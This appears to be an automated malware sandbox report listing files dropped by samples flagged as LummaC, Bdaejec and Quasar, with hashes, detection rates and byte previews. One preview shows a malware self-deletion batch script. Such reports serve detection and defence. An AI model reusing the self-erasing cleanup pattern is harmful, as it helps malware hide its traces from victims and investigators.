                            Lisect_AVT_24003_G1A_72.exeGet hashmaliciousLummaC, Bdaejec, LummaC StealerBrowse
                              Lisect_AVT_24003_G1A_5.exeGet hashmaliciousQuasar, BdaejecBrowse
                                Process:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):19456
                                Entropy (8bit):6.590694334703423
                                Encrypted:false
                                SSDEEP:384:1F6STXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:7NQGPL4vzZq2o9W7GsxBbPr
                                MD5:69203C73AC60EA5A6F79F42DE29F7273
                                SHA1:258E4B0940E0C514C67B05180D756F121CC9F20B
                                SHA-256:75D79A6CE821626FCE09C84A82FBFAF6F4D24CB81F7845CE16200CE439FCB9E9
                                SHA-512:14FC99CA618A445899AB64C8A837AA2D2636729A872D71D45FDF37925072B500F5267BCC17FE8DDC9DC5806B50D2C14A7F9AFD2738758D1B1DF91F3882D167A1
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                Reputation:low
                                Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                                Process:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):2389504
                                Entropy (8bit):6.73134691102098
                                Encrypted:false
                                SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                                MD5:C8AA410F2F5F298C97D6CC544981060D
                                SHA1:5410135AF2C7C2B3650D161B04A2865F3CCB7895
                                SHA-256:8DF54AD279BDA82D87C827E6AD7A25CD169610FB43EFD3A0AF1DF9D8ADD498B8
                                SHA-512:9D39EB684E59BE7793556955E0A100D250CDC50F24BA88D3AF7FFD0531207672714269205E6D01FA61D452A99073393AF4E7800D77C3279DE82A0379AC4C8840
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                                Process:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):31744
                                Entropy (8bit):6.366720516287661
                                Encrypted:false
                                SSDEEP:768:uWQ3655Kv1X/qY1MSdZEQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdZXGCq2iW7z
                                MD5:849E26F092DF0AD9F26E1B128938E0C0
                                SHA1:B971002363FF595727D61A8CEEE2A1379DA9581C
                                SHA-256:3299C7306EB547A54AA38E54F0C8C31B211B84249E45E92F0C6254B79FB158FF
                                SHA-512:41B0127EBA491519F9E6D038688E3EDBF4453ACF131BEC78D01D6B42D29D0D183E95ED2156424CC2B04EDE91BB296F673C07B5AE2D77F83CDE6D0A5FD6A7D013
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):3146240
                                Entropy (8bit):7.971437934868994
                                Encrypted:false
                                SSDEEP:49152:27lf5RZ4Q9FDCjZtjBJBMndpCqYiCZG5uvmmAwYU9fF4nbGs/cSqyVU5jX:27lf5RWxfaHCqhCZ3dAwY+fFGqnX
                                MD5:EE50F2DB274C7ABDBAE3713A14020C24
                                SHA1:312AF659D98D04B23C6AB5F5324604FD04A96777
                                SHA-256:60285015F8B5E32F20411D30B7C64D8748827409275F5A42053B307BC2FF17DE
                                SHA-512:BBACD094942F9493D58367D19BF5573331D40C7CD96A2B0D4A787DE215E9C3C509C1F2F168B2E632C55686B41AE72713ABBE9214C04C889F8D3F18ECDA9B6B11
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 95%
                                • Antivirus: Virustotal, Detection: 86%, Browse
                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L....~.e...............".....>....................@......................................@... .. .... .. .......... .......,...x....................................................................................................................................4..................@............p......."...8..............@............@...0.......Z..............@................p.......b..............@....................d...b..............@....rsrc...............................@..@..........y.. ...(..................@....data....."......".................@...p.L~.u...P.......B..../............. ...........................................................................................................
                                Process:C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:true
                                Preview:[ZoneTransfer]....ZoneId=0
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.9881881703146915
                                Encrypted:false
                                SSDEEP:96:EiPFUbdhbrnswhna7afzQXIDcQ0c6obcE6cw3Kc+HbHg/5ksS/YyNlIcIPkMhFS4:LCfbrny0KsbAeljE/B9zuiFHZ24IO8p
                                MD5:27DCC637D1828AC2E263C9E8168C4EFD
                                SHA1:FADC207DBF3D8F44A0051F158150F3380332ECE5
                                SHA-256:A4A5FA034484600BB29C1629E5FB2D44F31E7270C6DD90E3FCEC8F06AF6D2EBC
                                SHA-512:ECA8A00ECD8C81C730B960408FD70B4AEFFC20013AD6A16AAC9D6A16FCB8044D9526A189C86F96D95D6DA5854CE0E30A07F7710DFE245D1B61AB38E6B22D1900
                                Malicious:false
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.5.0.6.0.2.3.2.8.6.0.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.5.0.6.0.3.3.7.5.4.8.1.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.3.a.7.7.6.8.3.-.1.b.5.3.-.4.7.5.9.-.a.2.4.4.-.0.5.8.d.1.f.e.8.5.1.d.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.e.9.d.d.c.8.-.a.8.9.0.-.4.6.7.a.-.8.e.b.0.-.3.6.6.b.5.a.9.4.b.d.8.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.j.H.Y.Z.k.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.5.4.-.0.0.0.1.-.0.0.1.4.-.6.9.e.a.-.b.7.1.e.4.0.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.1.2.4.1.1.7.5.4.7.f.e.1.d.8.5.c.b.8.f.b.2.8.3.5.e.9.7.e.1.0.e.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.j.H.Y.Z.k.o...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 15 streams, Thu Jul 25 03:10:03 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):155114
                                Entropy (8bit):1.8619255182314498
                                Encrypted:false
                                SSDEEP:384:LvFchuGcx9hnqhF+yzTkjv22wwM/ziNVuGAJuqYjSY9:Lv6YBx9mBng22SzeuGAE9jL
                                MD5:363DF81334FDF238131519FAD8E97E14
                                SHA1:A6A398B16889525842DF9186CAC012BA624169DF
                                SHA-256:552FAEFE4E95BE25636D1DBDDF4B10338C8716F171583D08F3CFB45FD09AC961
                                SHA-512:5659745B305A7E3990FEA09A75987D0036BDD98BE1D92653EA4A1B573B89FB0D3809C69CD58942B079F2A480159438BBF49C62525A5F4A1373776974D8980EEE
                                Malicious:false
                                Preview:MDMP..a..... .........f............D...............X.......l.... ......T...TO..........`.......8...........T............=..............h!..........T#..............................................................................eJ.......#......GenuineIntel............T.......T.....f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8302
                                Entropy (8bit):3.705915368048326
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJSQ6l6YrZ6a/HgmfmdsPpDy89bHasfNEtm:R6lXJF6l6Y16SgmfmgH5fND
                                MD5:3D2DAB96C8D274A1FA0D5DA3E322F587
                                SHA1:A46007F5318E2F9F70F75D636BF74E1D25688AA7
                                SHA-256:A261538CD3FBCAB2B9A76CACD51CBE40ED12493CCE67A138770458DC5D4625A4
                                SHA-512:8CFC5B7DBBD2ACC64B22D8E071E052C63F1AA9938487D123684E1B72062E7C29E28A452E61DD1004F59CA555E85FF7809831463659E45DBDA7EAA2E37111D72E
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.8.4.<./.P.i.
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4551
                                Entropy (8bit):4.4592509719173545
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsyJg77aI9X8WpW8VYdYm8M4JqEClaFHb+q8hUv+1lDgUed:uIjfAI7l17V5JqEM4b6UG3gUed
                                MD5:D0FECC6DE006DC5E33A7FE9C6B295A00
                                SHA1:9D4BC5DA1EB7BD94121475D47CA4045D7170F63A
                                SHA-256:D83536E95387BF09723AA1423559E8F1EB871A4D1D3B89287D93F39FC2B56614
                                SHA-512:FA8F778C18C87A42C00B574BC2C3DFA40C81AC885DCDE4D7BCFD90FA8E2FE224A15513776DBDEB6359F2043ACAB83358E085518B51B38A02A5E41FC046F69C44
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425892" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                Process:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):4
                                Entropy (8bit):1.5
                                Encrypted:false
                                SSDEEP:3:Nv:9
                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                Malicious:false
                                Preview:foo.
                                Process:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):4
                                Entropy (8bit):1.5
                                Encrypted:false
                                SSDEEP:3:Nv:9
                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                Malicious:false
                                Preview:foo.
                                Process:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):4
                                Entropy (8bit):1.5
                                Encrypted:false
                                SSDEEP:3:Nv:9
                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                Malicious:false
                                Preview:foo.
                                Process:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):4
                                Entropy (8bit):1.5
                                Encrypted:false
                                SSDEEP:3:Nv:9
                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                Malicious:false
                                Preview:foo.
                                Process:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):4
                                Entropy (8bit):1.5
                                Encrypted:false
                                SSDEEP:3:Nv:9
                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                Malicious:false
                                Preview:foo.
                                Process:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):4
                                Entropy (8bit):1.5
                                Encrypted:false
                                SSDEEP:3:Nv:9
                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                Malicious:false
                                Preview:foo.
                                Process:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):4
                                Entropy (8bit):1.5
                                Encrypted:false
                                SSDEEP:3:Nv:9
                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                Malicious:false
                                Preview:foo.
                                Process:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):4
                                Entropy (8bit):1.5
                                Encrypted:false
                                SSDEEP:3:Nv:9
                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                Malicious:false
                                Preview:foo.
                                Process:C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):3146240
                                Entropy (8bit):7.971437934868994
                                Encrypted:false
                                SSDEEP:49152:27lf5RZ4Q9FDCjZtjBJBMndpCqYiCZG5uvmmAwYU9fF4nbGs/cSqyVU5jX:27lf5RWxfaHCqhCZ3dAwY+fFGqnX
                                MD5:EE50F2DB274C7ABDBAE3713A14020C24
                                SHA1:312AF659D98D04B23C6AB5F5324604FD04A96777
                                SHA-256:60285015F8B5E32F20411D30B7C64D8748827409275F5A42053B307BC2FF17DE
                                SHA-512:BBACD094942F9493D58367D19BF5573331D40C7CD96A2B0D4A787DE215E9C3C509C1F2F168B2E632C55686B41AE72713ABBE9214C04C889F8D3F18ECDA9B6B11
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 95%
                                • Antivirus: Virustotal, Detection: 86%, Browse
                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L....~.e...............".....>....................@......................................@... .. .... .. .......... .......,...x....................................................................................................................................4..................@............p......."...8..............@............@...0.......Z..............@................p.......b..............@....................d...b..............@....rsrc...............................@..@..........y.. ...(..................@....data....."......".................@...p.L~.u...P.......B..../............. ...........................................................................................................
                                Process:C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:true
                                Preview:[ZoneTransfer]....ZoneId=0
                                Process:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):4
                                Entropy (8bit):1.5
                                Encrypted:false
                                SSDEEP:3:Nv:9
                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                Malicious:false
                                Preview:foo.
                                Process:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):190
                                Entropy (8bit):5.005965739271022
                                Encrypted:false
                                SSDEEP:3:jdKZOUkh4E2J5xAI6dkASMD2UUkh4E2J5xAI6dkAYKReJsjIdKZOUkh4E2J5xAIb:jdKo923faYMD2U923fa2/dKo923fa8jn
                                MD5:B6696B3AE187AFE7E400746B1EA761B5
                                SHA1:FB4256AA6CF8B8CD5570BFAD11C776DE200AB7DB
                                SHA-256:11102E7FA95D24BB55FF79FB0BFB09B522BFFAD2E7D406108FB309340C36BD18
                                SHA-512:F5C2F556BC9C58663AABAD4323A4EA2F60646FD01F414189C41272F71592200A4E66C08BA45D26279CD39DBF75485547305E47382F969B3FF0AA86A766A6FC56
                                Malicious:false
                                Preview::DELFILE..del "C:\Users\user\AppData\Local\Temp\jHYZko.exe"..if exist "C:\Users\user\AppData\Local\Temp\jHYZko.exe" goto :DELFILE..del "C:\Users\user\AppData\Local\Temp\2b7051ed.bat"..
                                Process:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):4
                                Entropy (8bit):1.5
                                Encrypted:false
                                SSDEEP:3:Nv:9
                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                Malicious:false
                                Preview:foo.
                                Process:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):4
                                Entropy (8bit):1.5
                                Encrypted:false
                                SSDEEP:3:Nv:9
                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                Malicious:false
                                Preview:foo.
                                Process:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):4
                                Entropy (8bit):1.5
                                Encrypted:false
                                SSDEEP:3:Nv:9
                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                Malicious:false
                                Preview:foo.
                                Process:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):4
                                Entropy (8bit):1.5
                                Encrypted:false
                                SSDEEP:3:Nv:9
                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                Malicious:false
                                Preview:foo.
                                Process:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):4
                                Entropy (8bit):1.5
                                Encrypted:false
                                SSDEEP:3:Nv:9
                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                Malicious:false
                                Preview:foo.
                                Process:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                File Type:ASCII text
                                Category:modified
                                Size (bytes):4
                                Entropy (8bit):1.5
                                Encrypted:false
                                SSDEEP:3:Nv:9
                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                Malicious:false
                                Preview:foo.
                                Process:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):4
                                Entropy (8bit):1.5
                                Encrypted:false
                                SSDEEP:3:Nv:9
                                MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                Malicious:false
                                Preview:foo.
                                Process:C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15872
                                Entropy (8bit):7.031075575407894
                                Encrypted:false
                                SSDEEP:384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
